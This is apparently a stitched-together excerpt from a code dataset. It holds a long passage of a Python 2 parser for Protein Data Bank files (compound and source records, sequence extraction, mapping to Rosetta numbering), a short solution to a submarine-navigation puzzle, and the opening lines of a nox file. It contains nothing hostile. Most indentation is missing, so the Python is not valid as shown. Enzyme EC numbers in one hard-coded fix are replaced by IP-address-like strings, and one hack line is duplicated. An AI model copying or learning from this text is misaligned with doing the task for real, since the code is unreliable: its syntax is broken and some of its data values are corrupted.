DBref[pdb_id][database][chain_id] = {'dbAccession' : dbAccession, 'dbIdCode' : dbIdCode, 'PDBtoDB_mapping' : []}
DBref[pdb_id][database][chain_id]['PDBtoDB_mapping'].append(
{'PDBRange' : ("%d%s" % (seqBegin, insertBegin), "%d%s" % (seqEnd, insertEnd)),
'dbRange' : ("%d%s" % (dbseqBegin, idbnsBeg), "%d%s" % (dbseqEnd, dbinsEnd)),
}
)
return DBref
def get_molecules_and_source(self):
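        '''Parses the COMPND and SOURCE records and returns a list of molecule dicts, one per MOL_ID, with normalized and typed fields (Chains, Engineered, Mutation, Synthetic, etc.).'''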
# Check the COMPND lines
COMPND_lines = self.parsed_lines["COMPND"]
for x in range(1, len(COMPND_lines)):
assert(int(COMPND_lines[x][7:10]) == x+1)
if not COMPND_lines:
raise MissingRecordsException("No COMPND records were found. Handle this gracefully.")
# Concatenate the COMPND lines into one string, removing double spaces
COMPND_lines = " ".join([line[10:].strip() for line in COMPND_lines])
        COMPND_lines = COMPND_lines.replace("  ", " ")
# Split the COMPND lines into separate molecule entries
molecules = {}
MOL_DATA = ["MOL_ID:%s".strip() % s for s in COMPND_lines.split('MOL_ID:') if s]
# Parse the molecule entries
# The hacks below are due to some PDBs breaking the grammar by not following the standard which states:
# Specification: A String composed of a token and its associated value separated by a colon.
# Specification List: A sequence of Specifications, separated by semi-colons.
# COMPND records are a specification list so semi-colons should not appear inside entries.
# The hacks below could probably be removed if I assumed that the standard was not followed (valid) by
# e.g. splitting the COMPND data by allowed tokens (the keys of COMPND_field_map)
# but I would want lots of tests in place first.
for MD in MOL_DATA:
# Hack for 2OMT
MD = MD.replace('EPITHELIAL-CADHERIN; E-CAD/CTF1', 'EPITHELIAL-CADHERIN: E-CAD/CTF1')
# Hack for 1M2T
MD = MD.replace('SYNONYM: BETA-GALACTOSIDE SPECIFIC LECTIN I A CHAIN; MLA; ML-I A;', 'SYNONYM: BETA-GALACTOSIDE SPECIFIC LECTIN I A CHAIN, MLA, ML-I A,')
# Hack for 1IBR
MD = MD.replace('SYNONYM: RAN; TC4; RAN GTPASE; ANDROGEN RECEPTOR- ASSOCIATED PROTEIN 24;', 'SYNONYM: RAN TC4, RAN GTPASE, ANDROGEN RECEPTOR-ASSOCIATED PROTEIN 24;')
# Hack for 1IBR
MD = MD.replace('SYNONYM: KARYOPHERIN BETA-1 SUBUNIT; P95; NUCLEAR FACTOR P97; IMPORTIN 90', 'SYNONYM: KARYOPHERIN BETA-1 SUBUNIT, P95, NUCLEAR FACTOR P97, IMPORTIN 90')
# Hack for 1NKH
MD = MD.replace('SYNONYM: B4GAL-T1; BETA4GAL-T1; BETA-1,4-GALTASE 1; BETA-1, 4-GALACTOSYLTRANSFERASE 1; UDP-GALACTOSE:BETA-N- ACETYLGLUCOSAMINE BETA-1,4-GALACTOSYLTRANSFERASE 1; EC: 172.16.58.3, 192.168.127.12, 192.168.3.11; ENGINEERED: YES; OTHER_DETAILS: CHAINS A AND B FORM FIRST, C AND D SECOND LACTOSE SYNTHASE COMPLEX',
'SYNONYM: B4GAL-T1, BETA4GAL-T1, BETA-1,4-GALTASE 1, BETA-1, 4-GALACTOSYLTRANSFERASE 1, UDP-GALACTOSE:BETA-N- ACETYLGLUCOSAMINE BETA-1,4-GALACTOSYLTRANSFERASE 1, EC: 172.16.58.3, 192.168.127.12, 192.168.3.11, ENGINEERED: YES, OTHER_DETAILS: CHAINS A AND B FORM FIRST, C AND D SECOND LACTOSE SYNTHASE COMPLEX')
# Hacks for 2PMI
MD = MD.replace('SYNONYM: SERINE/THREONINE-PROTEIN KINASE PHO85; NEGATIVE REGULATOR OF THE PHO SYSTEM;',
'SYNONYM: SERINE/THREONINE-PROTEIN KINASE PHO85, NEGATIVE REGULATOR OF THE PHO SYSTEM;')
MD = MD.replace('SYNONYM: PHOSPHATE SYSTEM CYCLIN PHO80; AMINOGLYCOSIDE ANTIBIOTIC SENSITIVITY PROTEIN 3;',
'SYNONYM: PHOSPHATE SYSTEM CYCLIN PHO80, AMINOGLYCOSIDE ANTIBIOTIC SENSITIVITY PROTEIN 3;')
# Hack for 1JRH
MD = MD.replace('FAB FRAGMENT;PEPSIN DIGESTION OF INTACT ANTIBODY', 'FAB FRAGMENT,PEPSIN DIGESTION OF INTACT ANTIBODY')
# Hack for 1KJ1
MD = MD.replace('SYNONYM: MANNOSE-SPECIFIC AGGLUTININ; LECGNA ', 'SYNONYM: MANNOSE-SPECIFIC AGGLUTININ, LECGNA ')
# Hack for 1OCC - The Dean and I
MD = MD.replace('SYNONYM: FERROCYTOCHROME C\:OXYGEN OXIDOREDUCTASE', 'SYNONYM: FERROCYTOCHROME C, OXYGEN OXIDOREDUCTASE')
# Hack for 2AKY
MD = MD.replace('SYNONYM: ATP\:AMP PHOSPHOTRANSFERASE, MYOKINASE', 'SYNONYM: ATP, AMP PHOSPHOTRANSFERASE, MYOKINASE')
# Hack for 3BCI
MD = MD.replace('SYNONYM: THIOL:DISULFIDE OXIDOREDUCTASE DSBA', 'SYNONYM: THIOL, DISULFIDE OXIDOREDUCTASE DSBA')
# Hack for 3BCI
MD = MD.replace('SYNONYM: THIOL:DISULFIDE OXIDOREDUCTASE DSBA', 'SYNONYM: THIOL, DISULFIDE OXIDOREDUCTASE DSBA')
# Hack for 1ELV
MD = MD.replace('FRAGMENT: CCP2-SP CATALYTIC FRAGMENT: ASP363-ASP-673 SEGMENT PRECEDED BY AN ASP-LEU SEQUENCE ADDED AT THE N-TERMINAL END',
'FRAGMENT: CCP2-SP CATALYTIC FRAGMENT; ASP363-ASP-673 SEGMENT PRECEDED BY AN ASP-LEU SEQUENCE ADDED AT THE N-TERMINAL END')
# Hack for 1E6E
MD = MD.replace('MOLECULE: NADPH\:ADRENODOXIN OXIDOREDUCTASE;', 'MOLECULE: NADPH;ADRENODOXIN OXIDOREDUCTASE;')
# Hack for 1JZD
MD = MD.replace('MOLECULE: THIOL:DISULFIDE INTERCHANGE PROTEIN', 'MOLECULE: THIOL;DISULFIDE INTERCHANGE PROTEIN')
# Hack for 1N2C
MD = MD.replace('OTHER_DETAILS: 2\:1 COMPLEX OF HOMODIMERIC FE-PROTEIN', 'OTHER_DETAILS: 2;1 COMPLEX OF HOMODIMERIC FE-PROTEIN')
# Hack for 1S6P
MD = MD.replace('MOLECULE: POL POLYPROTEIN [CONTAINS: REVERSE TRANSCRIPTASE]', 'MOLECULE: POL POLYPROTEIN [CONTAINS; REVERSE TRANSCRIPTASE]')
# Hack for 1Z9E
MD = MD.replace('FRAGMENT: SEQUENCE DATABASE RESIDUES 347-471 CONTAINS: HIV- 1 INTEGRASE-BINDING DOMAIN', 'FRAGMENT: SEQUENCE DATABASE RESIDUES 347-471 CONTAINS; HIV- 1 INTEGRASE-BINDING DOMAIN')
# Hacks for 2GOX
MD = MD.replace('FRAGMENT: FRAGMENT OF ALPHA CHAIN: RESIDUES 996-1287;', 'FRAGMENT: FRAGMENT OF ALPHA CHAIN; RESIDUES 996-1287;')
MD = MD.replace('FRAGMENT: C-TERMINAL DOMAIN: RESIDUES 101-165;', 'FRAGMENT: C-TERMINAL DOMAIN; RESIDUES 101-165;')
MOL_fields = [s.strip() for s in MD.split(';') if s.strip()]
molecule = {}
for field in MOL_fields:
field = field.split(":")
assert(1 <= len(field) <= 2)
if len(field) == 2: # Hack for 1MBG - missing field value
field_name = COMPND_field_map[field[0].strip()]
field_data = field[1].strip()
molecule[field_name] = field_data
### Normalize and type the fields ###
# Required (by us) fields
molecule['MoleculeID'] = int(molecule['MoleculeID'])
molecule['Chains'] = map(string.strip, molecule['Chains'].split(','))
for c in molecule['Chains']:
assert(len(c) == 1)
# Optional fields
if not molecule.get('Engineered'):
molecule['Engineered'] = None
elif molecule.get('Engineered') == 'YES':
molecule['Engineered'] = True
elif molecule.get('Engineered') == 'NO':
molecule['Engineered'] = False
else:
raise PDBParsingException("Error parsing ENGINEERED field of COMPND lines. Expected 'YES' or 'NO', got '%s'." % molecule['Engineered'])
if molecule.get('Mutation'):
if molecule['Mutation'] != 'YES':
raise PDBParsingException("Error parsing MUTATION field of COMPND lines. Expected 'YES', got '%s'." % molecule['Mutation'])
else:
molecule['Mutation'] = True
else:
molecule['Mutation'] = None
# Add missing fields
for k in COMPND_field_map.values():
if k not in molecule.keys():
molecule[k] = None
molecules[molecule['MoleculeID']] = molecule
# Extract the SOURCE lines
SOURCE_lines = self.parsed_lines["SOURCE"]
for x in range(1, len(SOURCE_lines)):
assert(int(SOURCE_lines[x][7:10]) == x+1)
if not SOURCE_lines:
raise MissingRecordsException("No SOURCE records were found. Handle this gracefully.")
# Concatenate the SOURCE lines into one string, removing double spaces
SOURCE_lines = " ".join([line[10:].strip() for line in SOURCE_lines])
        SOURCE_lines = SOURCE_lines.replace("  ", " ")
# Split the SOURCE lines into separate molecule entries
MOL_DATA = ["MOL_ID:%s".strip() % s for s in SOURCE_lines.split('MOL_ID:') if s]
# Parse the molecule entries
for MD in MOL_DATA:
MOL_fields = [s.strip() for s in MD.split(';') if s.strip()]
new_molecule = {}
for field in MOL_fields:
field = field.split(":")
if SOURCE_field_map.get(field[0].strip()):
field_name = SOURCE_field_map[field[0].strip()]
field_data = field[1].strip()
new_molecule[field_name] = field_data
MoleculeID = int(new_molecule['MoleculeID'])
assert(MoleculeID in molecules)
molecule = molecules[MoleculeID]
for field_name, field_data in new_molecule.iteritems():
if field_name != 'MoleculeID':
molecule[field_name] = field_data
# Normalize and type the fields
if not molecule.get('Synthetic'):
molecule['Synthetic'] = None
elif molecule.get('Synthetic') == 'YES':
molecule['Synthetic'] = True
elif molecule.get('Synthetic') == 'NO':
molecule['Synthetic'] = False
else:
raise PDBParsingException("Error parsing SYNTHETIC field of SOURCE lines. Expected 'YES' or 'NO', got '%s'." % molecule['Synthetic'])
# Add missing fields
for k in SOURCE_field_map.values():
if k not in molecule.keys():
molecule[k] = None
return [v for k, v in sorted(molecules.iteritems())]
def get_journal(self):
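        '''Returns the primary citation information parsed from the JRNL records, or None if the file has no JRNL records.'''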
if self.parsed_lines["JRNL "]:
if not self.journal:
self.journal = JRNL(self.parsed_lines["JRNL "])
return self.journal.get_info()
return None
### Sequence-related functions ###
def _get_SEQRES_sequences(self):
'''Creates the SEQRES Sequences and stores the chains in order of their appearance in the SEQRES records. This order of chains
in the SEQRES sequences does not always agree with the order in the ATOM records.'''
pdb_id = self.get_pdb_id()
SEQRES_lines = self.parsed_lines["SEQRES"]
modified_residue_mapping_3 = self.modified_residue_mapping_3
# I commented this out since we do not need it for my current test cases
#for k, v in self.modified_residues.iteritems():
# assert(v['modified_residue'] not in modified_residues)
# modified_residues[v['modified_residue']] = v['original_residue_3']
for x in range(0, len(SEQRES_lines)):
assert(SEQRES_lines[x][7:10].strip().isdigit())
seqres_chain_order = []
SEQRES_lines = [line[11:].rstrip() for line in SEQRES_lines] # we cannot strip the left characters as some cases e.g. 2MBP are missing chain identifiers
# Collect all residues for all chains, remembering the chain order
chain_tokens = {}
for line in SEQRES_lines:
chainID = line[0]
if chainID not in seqres_chain_order:
seqres_chain_order.append(chainID)
chain_tokens[chainID] = chain_tokens.get(chainID, [])
chain_tokens[chainID].extend(line[6:].strip().split())
sequences = {}
self.chain_types = {}
for chain_id, tokens in chain_tokens.iteritems():
# Determine whether the chain is DNA, RNA, or a protein chain
# 1H38 is a good test for this - it contains DNA (chains E and G and repeated by H, K, N, J, M, P), RNA (chain F, repeated by I, L, O) and protein (chain D, repeated by A,B,C) sequences
# 1ZC8 is similar but also has examples of DU
# 4IHY has examples of DI (I is inosine)
# 2GRB has RNA examples of I and U
# 1LRP has protein chains with only CA atoms
# This will throw an exception when a non-canonical is found which is not listed in basics.py. In that case, the list in basics.py should be updated.
chain_type = None
set_of_tokens = set(tokens)
if (set(tokens).union(all_recognized_dna) == all_recognized_dna):# or (len(set_of_tokens) <= 5 and len(set_of_tokens.union(dna_nucleotides)) == len(set_of_tokens) + 1): # allow one unknown DNA residue
chain_type = 'DNA'
elif (set(tokens).union(all_recognized_rna) == all_recognized_rna):# or (len(set_of_tokens) <= 5 and len(set_of_tokens.union(dna_nucleotides)) == len(set_of_tokens) + 1): # allow one unknown DNA residue
chain_type = 'RNA'
else:
assert(len(set(tokens).intersection(dna_nucleotides)) == 0)
assert(len(set(tokens).intersection(rna_nucleotides)) == 0)
chain_type = 'Protein'
if not self.chain_atoms.get(chain_id):
# possible for biological unit files
continue
if self.chain_atoms[chain_id] == set(['CA']):
chain_type = 'Protein skeleton'
# Get the sequence, mapping non-canonicals to the appropriate letter
self.chain_types[chain_id] = chain_type
sequence = []
if chain_type == 'DNA':
for r in tokens:
if dna_nucleotides_2to1_map.get(r):
sequence.append(dna_nucleotides_2to1_map[r])
else:
if non_canonical_dna.get(r):
sequence.append(non_canonical_dna[r])
else:
raise Exception("Unknown DNA residue %s." % r)
elif chain_type == 'RNA':
for r in tokens:
if r in rna_nucleotides:
sequence.append(r)
else:
if non_canonical_rna.get(r):
sequence.append(non_canonical_rna[r])
else:
raise Exception("Unknown RNA residue %s." % r)
else:
token_counter = 0
for r in tokens:
token_counter += 1
if residue_type_3to1_map.get(r):
sequence.append(residue_type_3to1_map[r])
else:
if self.modified_residue_mapping_3.get(r):
sequence.append(residue_type_3to1_map[self.modified_residue_mapping_3.get(r)])
elif non_canonical_amino_acids.get(r):
#print('Mapping non-canonical residue %s to %s.' % (r, non_canonical_amino_acids[r]))
#print(SEQRES_lines)
#print(line)
sequence.append(non_canonical_amino_acids[r])
elif r == 'UNK':
continue
# Skip these residues
elif r == 'ACE' and token_counter == 1:
# Always allow ACE as the first residue of a chain
sequence.append('X')
# End of skipped residues
else:
#print(modified_residue_mapping_3)
if modified_residue_mapping_3.get(r):
if modified_residue_mapping_3[r] == 'UNK':
sequence.append('X')
else:
assert(modified_residue_mapping_3[r] in residue_types_3)
sequence.append(residue_type_3to1_map[modified_residue_mapping_3[r]])
else:
raise Exception("Unknown protein residue %s in chain %s." % (r, chain_id))
sequences[chain_id] = "".join(sequence)
self.seqres_chain_order = seqres_chain_order
# Create Sequence objects for the SEQRES sequences
for chain_id, sequence in sequences.iteritems():
self.seqres_sequences[chain_id] = Sequence.from_sequence(chain_id, sequence, self.chain_types[chain_id])
def _get_ATOM_sequences(self):
'''Creates the ATOM Sequences.'''
# Get a list of all residues with ATOM or HETATM records
atom_sequences = {}
structural_residue_IDs_set = set() # use a set for a quicker lookup
ignore_HETATMs = True # todo: fix this if we need to deal with HETATMs
residue_lines_by_chain = []
structural_residue_IDs_set = []
model_index = 0
residue_lines_by_chain.append([])
structural_residue_IDs_set.append(set())
full_code_map = {}
for l in self.structure_lines:
if l.startswith("TER "):
model_index += 1
residue_lines_by_chain.append([])
structural_residue_IDs_set.append(set())
else:
residue_id = l[21:27]
if residue_id not in structural_residue_IDs_set[model_index]:
residue_lines_by_chain[model_index].append(l)
structural_residue_IDs_set[model_index].add(residue_id)
full_code_map[l[21]] = full_code_map.get(l[21], set())
full_code_map[l[21]].add(l[17:20].strip())
# Get the residues used by the residue lines. These can be used to determine the chain type if the header is missing.
for chain_id in self.atom_chain_order:
if full_code_map.get(chain_id):
# The chains may contain other molecules e.g. MG or HOH so before we decide their type based on residue types alone,
# we subtract out those non-canonicals
canonical_molecules = full_code_map[chain_id].intersection(dna_nucleotides.union(rna_nucleotides).union(residue_types_3))
if canonical_molecules.union(dna_nucleotides) == dna_nucleotides:
self.chain_types[chain_id] = 'DNA'
elif canonical_molecules.union(rna_nucleotides) == rna_nucleotides:
self.chain_types[chain_id] = 'RNA'
else:
self.chain_types[chain_id] = 'Protein'
line_types_by_chain = []
chain_ids = []
for model_index in range(len(residue_lines_by_chain)):
line_types = set()
if residue_lines_by_chain[model_index]:
chain_ids.append(residue_lines_by_chain[model_index][0][21])
for l in residue_lines_by_chain[model_index]:
line_types.add(l[0:6])
if line_types == set(['ATOM']):
line_types_by_chain.append('ATOM')
elif line_types == set(['HETATM']):
line_types_by_chain.append('HETATM')
else:
line_types_by_chain.append('Mixed')
for x in range(0, len(residue_lines_by_chain)):
residue_lines = residue_lines_by_chain[x]
line_types = line_types_by_chain[x]
if ignore_HETATMs and line_types == 'HETATM':
continue
for y in range(len(residue_lines)):
l = residue_lines[y]
residue_type = l[17:20].strip()
if l.startswith("HETATM"):
if self.modified_residue_mapping_3.get(residue_type):
residue_type = self.modified_residue_mapping_3[residue_type]
elif y == (len(residue_lines) - 1):
# last residue in the chain
if residue_type == 'NH2':
residue_type = 'UNK' # fixes a few cases e.g. 1MBG, 1K9Q, 1KA6
elif ignore_HETATMs:
continue
elif ignore_HETATMs:
continue
residue_id = l[21:27]
chain_id = l[21]
if chain_id in self.chain_types:
# This means the pdb had SEQRES and we constructed atom_sequences
chain_type = self.chain_types[chain_id]
else:
# Otherwise assume this is protein
chain_type = 'Protein'
atom_sequences[chain_id] = atom_sequences.get(chain_id, Sequence(chain_type))
residue_type = self.modified_residue_mapping_3.get(residue_type, residue_type)
short_residue_type = None
if residue_type == 'UNK':
short_residue_type = 'X'
elif chain_type == 'Protein' or chain_type == 'Protein skeleton':
short_residue_type = residue_type_3to1_map.get(residue_type) or protonated_residue_type_3to1_map.get(residue_type) or non_canonical_amino_acids.get(residue_type)
elif chain_type == 'DNA':
short_residue_type = dna_nucleotides_2to1_map.get(residue_type) or non_canonical_dna.get(residue_type)
elif chain_type == 'RNA':
short_residue_type = non_canonical_rna.get(residue_type) or residue_type
if not short_residue_type:
if l.startswith("ATOM") and l[12:16] == ' OH2' and l[17:20] == 'TIP':
continue
elif not self.strict:
short_residue_type = 'X'
else:
raise NonCanonicalResidueException("Unrecognized residue type %s in PDB file '%s', residue ID '%s'." % (residue_type, str(self.pdb_id), str(residue_id)))
#structural_residue_IDs.append((residue_id, short_residue_type))
# KAB - way to allow for multiresidue noncanonical AA's
if len(short_residue_type) == 1:
atom_sequences[chain_id].add(PDBResidue(residue_id[0], residue_id[1:], short_residue_type, chain_type))
else:
for char in short_residue_type:
atom_sequences[chain_id].add(PDBResidue(residue_id[0], residue_id[1:], char, chain_type))
self.atom_sequences = atom_sequences
def _get_ATOM_sequences_2(self):
'''Creates the ATOM Sequences.'''
# Get a list of all residues with ATOM or HETATM records
atom_sequences = {}
structural_residue_IDs_set = set() # use a set for a quicker lookup
ignore_HETATMs = True # todo: fix this if we need to deal with HETATMs
for l in self.structure_lines:
residue_type = l[17:20].strip()
if l.startswith("HETATM"):
if self.modified_residue_mapping_3.get(residue_type):
residue_type = self.modified_residue_mapping_3[residue_type]
elif ignore_HETATMs:
continue
residue_id = l[21:27]
if residue_id not in structural_residue_IDs_set:
chain_id = l[21]
chain_type = self.chain_types[chain_id]
atom_sequences[chain_id] = atom_sequences.get(chain_id, Sequence(chain_type))
residue_type = l[17:20].strip()
residue_type = self.modified_residue_mapping_3.get(residue_type, residue_type)
short_residue_type = None
if residue_type == 'UNK':
short_residue_type = 'X'
elif chain_type == 'Protein' or chain_type == 'Protein skeleton':
short_residue_type = residue_type_3to1_map.get(residue_type) or protonated_residue_type_3to1_map.get(residue_type)
elif chain_type == 'DNA':
short_residue_type = dna_nucleotides_2to1_map.get(residue_type) or non_canonical_dna.get(residue_type)
elif chain_type == 'RNA':
short_residue_type = non_canonical_rna.get(residue_type) or residue_type
elif not self.strict:
short_residue_type = 'X'
else:
raise NonCanonicalResidueException("Unrecognized residue type %s in PDB file '%s', residue ID '%s'." % (residue_type, str(self.pdb_id), str(residue_id)))
#structural_residue_IDs.append((residue_id, short_residue_type))
atom_sequences[chain_id].add(PDBResidue(residue_id[0], residue_id[1:], short_residue_type, chain_type))
structural_residue_IDs_set.add(residue_id)
self.atom_sequences = atom_sequences
def construct_pdb_to_rosetta_residue_map(self, rosetta_scripts_path, rosetta_database_path, extra_command_flags = None):
''' Uses the features database to create a mapping from Rosetta-numbered residues to PDB ATOM residues.
Next, the object's rosetta_sequences (a dict of Sequences) element is created.
Finally, a SequenceMap object is created mapping the Rosetta Sequences to the ATOM Sequences.
The extra_command_flags parameter expects a string e.g. "-ignore_zero_occupancy false".
'''
## Create a mapping from Rosetta-numbered residues to PDB ATOM residues
from map_pdb_residues import get_pdb_contents_to_pose_residue_map
# Apply any PDB-specific hacks
specific_flag_hacks = None
skeletal_chains = sorted([k for k in self.chain_types.keys() if self.chain_types[k] == 'Protein skeleton'])
if skeletal_chains:
raise PDBMissingMainchainAtomsException('The PDB to Rosetta residue map could not be created as chains %s only have CA atoms present.' % ", ".join(skeletal_chains))
# Get the residue mapping using the features database
pdb_file_contents = "\n".join(self.structure_lines)
success, mapping = get_pdb_contents_to_pose_residue_map(pdb_file_contents, rosetta_scripts_path, rosetta_database_path, pdb_id = self.pdb_id, extra_flags = ((specific_flag_hacks or '') + ' ' + (extra_command_flags or '')).strip())
if not success:
raise Exception("An error occurred mapping the PDB ATOM residue IDs to the Rosetta numbering.\n%s" % "\n".join(mapping))
## Create Sequences for the Rosetta residues (self.rosetta_sequences)
# Initialize maps
rosetta_residues = {}
rosetta_sequences = {}
for chain_id in self.atom_chain_order:
chain_type = self.chain_types[chain_id]
rosetta_residues[chain_id] = {}
rosetta_sequences[chain_id] = Sequence(chain_type)
# Create a map rosetta_residues, Chain -> Rosetta residue ID -> Rosetta residue information
rosetta_pdb_mappings = {}
for chain_id in self.atom_chain_order:
rosetta_pdb_mappings[chain_id] = {}
for k, v in mapping.iteritems():
rosetta_residues[k[0]][v['pose_residue_id']] = v
rosetta_pdb_mappings[k[0]][v['pose_residue_id']] = k
# Create rosetta_sequences map Chain -> Sequence(Residue)
for chain_id, v in sorted(rosetta_residues.iteritems()):
chain_type = self.chain_types[chain_id]
for rosetta_id, residue_info in sorted(v.iteritems()):
short_residue_type = None
if chain_type == 'Protein':
residue_type = residue_info['name3'].strip()
short_residue_type = residue_type_3to1_map[residue_type]
else:
assert(chain_type == 'DNA' or chain_type == 'RNA')
residue_type = residue_info['res_type'].strip()
if residue_type.find('UpperDNA') != -1 or residue_type.find('LowerDNA') != -1:
residue_type = residue_type[:3]
short_residue_type = dna_nucleotides_3to1_map.get(residue_type) # Commenting this out since Rosetta does not seem to handle these "or non_canonical_dna.get(residue_type)"
assert(short_residue_type)
rosetta_sequences[chain_id].add(Residue(chain_id, rosetta_id, short_residue_type, chain_type))
## Create SequenceMap objects to map the Rosetta Sequences to the ATOM Sequences
rosetta_to_atom_sequence_maps = {}
for chain_id, rosetta_pdb_mapping in rosetta_pdb_mappings.iteritems():
rosetta_to_atom_sequence_maps[chain_id] = SequenceMap.from_dict(rosetta_pdb_mapping)
self.rosetta_to_atom_sequence_maps = rosetta_to_atom_sequence_maps
self.rosetta_sequences = rosetta_sequences
def get_atom_sequence_to_rosetta_map(self):
'''Uses the Rosetta->ATOM injective map to construct an injective mapping from ATOM->Rosetta.
We do not extend the injection to include ATOM residues which have no corresponding Rosetta residue.
        e.g. atom_sequence_to_rosetta_mapping[c].map.get('A 45 ') will return None if there is no corresponding Rosetta residue
        rather than explicitly mapping those residues to None.
Likewise, if a PDB chain c is not present in the Rosetta model then atom_sequence_to_rosetta_mapping[c].map.get(s) returns None.
'''
        if not (self.rosetta_to_atom_sequence_maps and self.rosetta_sequences):
raise Exception('The PDB to Rosetta mapping has not been determined. Please call construct_pdb_to_rosetta_residue_map first.')
atom_sequence_to_rosetta_mapping = {}
for chain_id, mapping in self.rosetta_to_atom_sequence_maps.iteritems():
chain_mapping = {}
for k in mapping:
chain_mapping[k[1]] = k[0]
atom_sequence_to_rosetta_mapping[chain_id] = SequenceMap.from_dict(chain_mapping)
# Add empty maps for missing chains
for chain_id, sequence in self.atom_sequences.iteritems():
if not atom_sequence_to_rosetta_mapping.get(chain_id):
atom_sequence_to_rosetta_mapping[chain_id] = SequenceMap()
return atom_sequence_to_rosetta_mapping
def get_atom_sequence_to_rosetta_json_map(self):
'''Returns the mapping from PDB ATOM residue IDs to Rosetta residue IDs in JSON format.'''
import json
d = {}
atom_sequence_to_rosetta_mapping = self.get_atom_sequence_to_rosetta_map()
for c, sm in atom_sequence_to_rosetta_mapping.iteritems():
for k, v in sm.map.iteritems():
d[k] = v
return json.dumps(d, sort_keys = True)
def get_rosetta_sequence_to_atom_json_map(self):
'''Returns the mapping from Rosetta residue IDs to PDB ATOM residue IDs in JSON format.'''
import json
        if not (self.rosetta_to_atom_sequence_maps and self.rosetta_sequences):
raise Exception('The PDB to Rosetta mapping has not been determined. Please call construct_pdb_to_rosetta_residue_map first.')
d = {}
for c, sm in self.rosetta_to_atom_sequence_maps.iteritems():
for k, v in sm.map.iteritems():
d[k] = v
#d[c] = sm.map
return json.dumps(d, sort_keys = True)
def map_pdb_residues_to_rosetta_residues(self, mutations):
'''This function takes a list of ChainMutation objects and uses the PDB to Rosetta mapping to return the corresponding
list of SimpleMutation objects using Rosetta numbering.
e.g.
p = PDB(...)
p.construct_pdb_to_rosetta_residue_map()
rosetta_mutations = p.map_pdb_residues_to_rosetta_residues(pdb_mutations)
'''
        if not (self.rosetta_to_atom_sequence_maps and self.rosetta_sequences):
raise Exception('The PDB to Rosetta mapping has not been determined. Please call construct_pdb_to_rosetta_residue_map first.')
rosetta_mutations = []
atom_sequence_to_rosetta_mapping = self.get_atom_sequence_to_rosetta_map()
for m in mutations:
rosetta_residue_id = atom_sequence_to_rosetta_mapping[m.Chain].get('%s%s' % (m.Chain, m.ResidueID))
rosetta_mutations.append(SimpleMutation(m.WildTypeAA, rosetta_residue_id, m.MutantAA))
return rosetta_mutations
def assert_wildtype_matches(self, mutation):
'''Check that the wildtype of the Mutation object matches the PDB sequence.'''
readwt = self.getAminoAcid(self.getAtomLine(mutation.Chain, mutation.ResidueID))
assert(mutation.WildTypeAA == residue_type_3to1_map[readwt])
### END OF REFACTORED CODE
@staticmethod
def ChainResidueID2String(chain, residueID):
'''Takes a chain ID e.g. 'A' and a residueID e.g. '123' or '123A' and returns the 6-character identifier spaced as in the PDB format.'''
return "%s%s" % (chain, PDB.ResidueID2String(residueID))
@staticmethod
def ResidueID2String(residueID):
'''Takes a residueID e.g. '123' or '123A' and returns the 5-character identifier spaced as in the PDB format.'''
if residueID.isdigit():
return "%s " % (residueID.rjust(4))
else:
return "%s" % (residueID.rjust(5))
def validate_mutations(self, mutations):
'''This function has been refactored to use the SimpleMutation class.
The parameter is a list of Mutation objects. The function has no return value but raises a PDBValidationException
if the wildtype in the Mutation m does not match the residue type corresponding to residue m.ResidueID in the PDB file.
'''
# Chain, ResidueID, WildTypeAA, MutantAA
resID2AA = self.get_residue_id_to_type_map()
badmutations = []
for m in mutations:
wildtype = resID2AA.get(PDB.ChainResidueID2String(m.Chain, m.ResidueID), "")
if m.WildTypeAA != wildtype:
badmutations.append(m)
if badmutations:
raise PDBValidationException("The mutation(s) %s could not be matched against the PDB %s." % (", ".join(map(str, badmutations)), self.pdb_id))
def getAminoAcid(self, line):
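        '''Returns the three-letter residue name (columns 18-20) of an ATOM/HETATM line.'''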
return line[17:20]
def getAtomLine(self, chain, resid):
'''This function assumes that all lines are ATOM or HETATM lines.
resid should have the proper PDB format i.e. an integer left-padded
to length 4 followed by the insertion code which may be a blank space.'''
for line in self.lines:
fieldtype = line[0:6].strip()
assert(fieldtype == "ATOM" or fieldtype == "HETATM")
if line[21:22] == chain and resid == line[22:27]:
return line
raise Exception("Could not find the ATOM/HETATM line corresponding to chain '%(chain)s' and residue '%(resid)s'." % vars())
def CheckForPresenceOf(self, reslist):
'''This checks whether residues in reslist exist in the ATOM lines.
It returns a list of the residues in reslist which did exist.'''
if type(reslist) == type(""):
reslist = [reslist]
foundRes = {}
for line in self.lines:
resname = line[17:20]
if line[0:4] == "ATOM":
if resname in reslist:
foundRes[resname] = True
return foundRes.keys()
def get_residue_id_to_type_map(self):
'''Returns a dictionary mapping 6-character residue IDs (Chain, residue number, insertion code e.g. "A 123B") to the
corresponding one-letter amino acid.
Caveat: This function ignores occupancy - this function should be called once occupancy has been dealt with appropriately.'''
resid2type = {}
atomlines = self.parsed_lines['ATOM ']
for line in atomlines:
resname = line[17:20]
if resname in allowed_PDB_residues_types and line[13:16] == 'CA ':
resid2type[line[21:27]] = residue_type_3to1_map.get(resname) or protonated_residue_type_3to1_map.get(resname)
return resid2type
def chain_ids(self):
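        '''Returns the chain IDs containing ATOM records of standard residue types, in order of first appearance.'''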
chain_ids = set()
chainlist = []
for line in self.lines:
if line[0:4] == "ATOM" and line[17:20] in allowed_PDB_residues_types and line[26] == ' ':
chain = line[21:22]
if chain not in chain_ids:
chain_ids.add(chain)
chainlist.append(chain)
return chainlist
|
StarcoderdataPython
|
8037223
|
horizontal = 0
depth = 0
aim = 0
instructions = []
with open("Day02.txt", "r") as f:
data = f.read()
data = data.splitlines()
for i in data:
instructions.append(i.split(" "))
for i in instructions:
i[1] = int(i[1])
def part1(depth, horizontal):
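    '''Part 1: "up" and "down" change the depth directly, "forward" increases the horizontal position; prints horizontal * depth.'''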
for items in instructions:
if items[0] == "up":
depth -= items[1]
elif items[0] == "down":
depth += items[1]
elif items[0] == "forward":
horizontal += items[1]
print(horizontal*depth)
def part2(depth, horizontal, aim):
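    '''Part 2: "up" and "down" change the aim, "forward" increases the horizontal position and adds aim * distance to the depth; prints horizontal * depth.'''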
for items in instructions:
if items[0] == "up":
aim -= items[1]
elif items[0] == "down":
aim += items[1]
elif items[0] == "forward":
horizontal += items[1]
depth += aim*items[1]
print(horizontal*depth)
part1(depth, horizontal)
part2(depth, horizontal, aim)
|
StarcoderdataPython
|
11358353
|
<reponame>inhumantsar/fr2ics
from os.path import abspath
import os
import sys
import webbrowser
import nox
try:
from urllib import pathname2url
except:
from urllib.request import pathname2url
def _browser(path):
webbrowser.open("file://" + pathname2url(abspath(path)))
